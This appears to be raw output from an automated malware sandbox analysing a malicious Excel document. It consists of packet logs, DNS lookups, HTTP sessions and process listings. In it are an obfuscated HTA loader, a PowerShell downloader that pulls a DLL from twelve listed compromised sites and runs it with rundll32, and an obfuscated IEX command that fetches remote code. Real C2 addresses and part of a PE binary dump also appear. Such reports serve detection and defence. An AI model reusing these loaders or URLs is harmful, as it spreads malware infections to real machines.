                                                                                                                    Jan 28, 2022 21:24:49.637821913 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.637870073 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.640074968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.640115976 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.640157938 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.650208950 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.650253057 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.650327921 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.657399893 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.657444954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.657488108 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.667109966 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.667152882 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.667201996 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.676882029 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.676922083 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.676966906 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.687043905 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.687086105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.687134981 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.692123890 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.692188978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.692281008 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.696374893 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.696413040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.696484089 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.701627016 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.701666117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.701741934 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.724148989 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.724189997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.724239111 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.725034952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.725064039 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.725106001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.726974010 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.727015018 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.727062941 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.728899002 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.728935957 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.728984118 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.730818033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.730858088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.730905056 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.732680082 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.732723951 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.732770920 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.734559059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.734594107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.734646082 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.736397028 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.736435890 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.736481905 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.738244057 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.738281965 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.738327980 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.740010977 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.740046978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.740096092 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.741806030 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.741843939 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.741888046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.741892099 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.743604898 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.743640900 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.743676901 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.745340109 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.745374918 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.745409012 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.747041941 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.747081995 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.747108936 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.748723030 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.748759031 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.748783112 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.750379086 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.750416040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.750431061 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.752101898 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.752137899 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.752186060 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.753721952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.753757000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.753787041 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.755369902 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.755409002 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.755433083 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.756953001 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.756989956 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.757014036 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.758604050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.758641005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.758683920 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.760106087 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.760142088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.760166883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.761636972 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.761672974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.761714935 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.763217926 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.763252974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.763290882 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.764709949 CET804917074.208.236.157192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:24:47.921374083 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:24:47.943814039 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:24:48.295170069 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:24:48.314129114 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:24:47.921374083 CET | 192.168.2.22 | 8.8.8.8 | 0xb743 | Standard query (0) | kuyporn.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:24:48.295170069 CET | 192.168.2.22 | 8.8.8.8 | 0x3abf | Standard query (0) | jeffreylubin.igclout.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:24:47.943814039 CET | 8.8.8.8 | 192.168.2.22 | 0xb743 | No error (0) | kuyporn.com |  | 172.67.149.209 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:24:47.943814039 CET | 8.8.8.8 | 192.168.2.22 | 0xb743 | No error (0) | kuyporn.com |  | 104.21.11.177 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:24:48.314129114 CET | 8.8.8.8 | 192.168.2.22 | 0x3abf | No error (0) | jeffreylubin.igclout.com |  | 74.208.236.157 | A (IP address) | IN (0x0001)
                                                                                                                    • 91.240.118.168
                                                                                                                    • kuyporn.com
                                                                                                                    • jeffreylubin.igclout.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:24:41.280599117 CET | 0 | OUT | GET /qqw/aas/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:24:41.342391014 CET | 2 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:41 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 11230
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:39:54 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1cdba-2bde"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'\\166ar%20%71y%37}%D}}\'2}\'3Bq}}"}%8}(%53}!4}!2%69ng}E}=6ro}55


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                    1 | 192.168.2.22 | 49168 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                    Jan 28, 2022 21:24:47.819864988 CET | 13 | OUT | GET /qqw/aas/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:47.878390074 CET | 14 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:47 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1178
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:58:47 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1d227-49a"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://kuyporn.com/wp-content/XSs5/';$url2 = 'http://jeffreylubin.igclout.com/wp-admin/vzOG/';$url3 = 'http://flybustravel.com/cgi-bin/2TjUH/';$url4 = 'http://docs-construction.com/wp-admin/JJEf0kEA5/';$url5 = 'http://wallacebradley.com/css/YcDc927SJR/';$url6 = 'https://algzor.com/wp-includes/ghFXVrGLEh/';$url7 = 'https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/';$url8 = 'https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/';$url9 = 'https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/';$url10 = 'https://bluwom-milano.com/wp-content/FEj3y4z/';$url11 = 'https://thaireportchannel.com/wp-includes/KaWZp0odkEO/';$url12 = 'https://esaci-egypt.com/wp-includes/W7qXVeGp/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -
                                                                                                                    Jan 28, 2022 21:24:47.878407001 CET | 14 | IN
                                                                                                                    Data Ascii: s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',AADD;


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                    2 | 192.168.2.22 | 49169 | 172.67.149.209 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                    Jan 28, 2022 21:24:47.971502066 CET | 15 | OUT | GET /wp-content/XSs5/ HTTP/1.1
                                                                                                                    Host: kuyporn.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:48.031068087 CET | 16 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qSUayrKTMdgpKbPQ4MXKGDydjrEdM6JjR77w73yoD7Idbj3svQ0ldi3DTevTgtnI4Vjbi%2FsT2YJJMR7zvBVjf%2Bq2XN13WF2AQ1YojjHcH3aBHu873%2BfMPbRbtm0n5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 6d4cf243debe6964-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                    Data Ascii: 10dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors
                                                                                                                    Jan 28, 2022 21:24:48.031097889 CET | 17 | IN
                                                                                                                    Data Ascii: .css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]--><style type="text/css">body{margi
                                                                                                                    Jan 28, 2022 21:24:48.031115055 CET | 19 | IN
                                                                                                                    Data Ascii: shing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET">
                                                                                                                    Jan 28, 2022 21:24:48.031130075 CET | 20 | IN
                                                                                                                    Data Ascii: 10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6d4cf243debe6964</str
                                                                                                                    Jan 28, 2022 21:24:48.031141996 CET | 20 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                    3 | 192.168.2.22 | 49170 | 74.208.236.157 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                    Jan 28, 2022 21:24:48.477128983 CET | 20 | OUT | GET /wp-admin/vzOG/ HTTP/1.1
                                                                                                                    Host: jeffreylubin.igclout.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:48.685756922 CET | 22 | IN | HTTP/1.1 200 OK
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 557056
                                                                                                                    Connection: keep-alive
                                                                                                                    Keep-Alive: timeout=15
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Server: Apache
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Content-Disposition: attachment; filename="NsLUiuT.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Set-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B
                                                                                                                    Jan 28, 2022 21:24:48.685779095 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685797930 CET25INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685817003 CET26INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685838938 CET27INData Raw: 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 83 e8 10 8b e5 5d c3 cc cc cc
                                                                                                                    Data Ascii: MEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE3PEdM
                                                                                                                    Jan 28, 2022 21:24:48.685878992 CET29INData Raw: 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55 f4 8b 45 f4 3b 45 10 73 12 8b 4d fc 03 4d f4 8b 55 f8 03 55 f4 8a 02 88 01 eb dd 8b e5
                                                                                                                    Data Ascii: ]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>URE}t&}
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET30INData Raw: 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45 e0 8b 45 ec 3b 45 d8 74 0b 8b 4d e8 03 4d f0 3b 4d d8 76 48 8b 55 e4 8b 42 24 25 00 00
                                                                                                                    Data Ascii: 9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu3]
                                                                                                                    Jan 28, 2022 21:24:48.685919046 CET31INData Raw: ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0 75 07 33 c0 e9 ea 03 00 00 8b 4d 08 89 4d f4 8b 55 f4 0f b7 02 3d 4d 5a 00 00 74 12 68
                                                                                                                    Data Ascii: EPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8thb3:U
                                                                                                                    Jan 28, 2022 21:24:48.685937881 CET33INData Raw: e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff ff 83 c4 08 85 c0 75 12 8b 55 e0 0f b7 02 89 45 f8 c7 45 ec 01 00 00 00 eb 02 eb ad 83
                                                                                                                    Data Ascii: EMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\EEEM
                                                                                                                    Jan 28, 2022 21:24:48.685957909 CET34INData Raw: 30 05 10 2b 0d c8 30 05 10 8b 15 cc 30 05 10 0f af 15 bc 30 05 10 03 0d c8 30 05 10 03 d1 03 15 c8 30 05 10 8b 0d c8 30 05 10 0f af 0d bc 30 05 10 03 d1 2b 15 c0 30 05 10 8b 0d cc 30 05 10 0f af 0d c8 30 05 10 0f af 0d cc 30 05 10 03 d1 8b 0d cc
                                                                                                                    Data Ascii: 0+0000000+000000++0+0000000+000000++0+0000000
                                                                                                                    Jan 28, 2022 21:24:48.847829103 CET36INData Raw: 05 10 2b 0d c8 30 05 10 2b 0d c8 30 05 10 8b 15 c8 30 05 10 0f af 15 c8 30 05 10 03 ca 2b 0d cc 30 05 10 a1 c8 30 05 10 0f af 05 c4 30 05 10 0f af 05 cc 30 05 10 2b c8 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 2b ca a1 c0 30 05 10 0f af 05 cc 30 05
                                                                                                                    Data Ascii: +0+000+0000+00+000++00000++00+000+00+0+000+0000+00+0



                                                                                                                    Target ID:0
                                                                                                                    Start time:21:24:16
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13fdf0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:24:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x4a730000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:24:19
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x13ff00000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:24:22
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13fbc0000
                                                                                                                    File size:473600 bytes
